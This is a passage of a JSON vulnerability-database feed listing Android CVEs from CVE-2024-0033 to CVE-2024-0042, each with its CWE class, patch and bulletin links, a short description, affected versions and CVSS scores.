"cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.6, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T18:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0033", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193", "name" : "https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193", "name" : "https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229", "name" : "https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229", "name" : "https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple functions of ashmem-dev.cpp, there is a possible missing seal due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T19:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0034", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6", "name" : "https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6", "name" : "https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In BackgroundLaunchProcessController, there is a possible way to launch arbitrary activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2025-03-19T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0035", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4", "name" : "https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4", "name" : "https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In onNullBinding of TileLifecycleManager.java, there is a possible way to launch an activity from the background due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T15:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0036", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T15:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0037", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931", "name" : "https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931", "name" : "https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In applyCustomDescription of SaveUi.java, there is a possible way to view images belonging to a different user due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-03T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0038", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079", "name" : "https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T19:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0039", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-03-01", "name" : "https://source.android.com/security/bulletin/2024-03-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-11T17:15Z", "lastModifiedDate" : "2025-03-13T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0040", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864", "name" : "https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864", "name" : "https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T19:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0041", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-362" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In removePersistentDot of SystemStatusAnimationSchedulerImpl.kt, there is a possible race condition due to a logic error in the code. This could lead to local escalation of privilege that fails to remove the persistent dot with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.0, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.0, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2025-03-28T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0042", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-295" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In TBD of TBD, there is a possible confusion of OEM and DRM certificates due to improperly used crypto. This could lead to local bypass of DRM content protection with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2024-12-17T16:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0043", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Permission/+/8141e8f4dd77b9f8fb485e23ddf028c57fcd4fca", "name" : "https://android.googlesource.com/platform/packages/modules/Permission/+/8141e8f4dd77b9f8fb485e23ddf028c57fcd4fca", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : 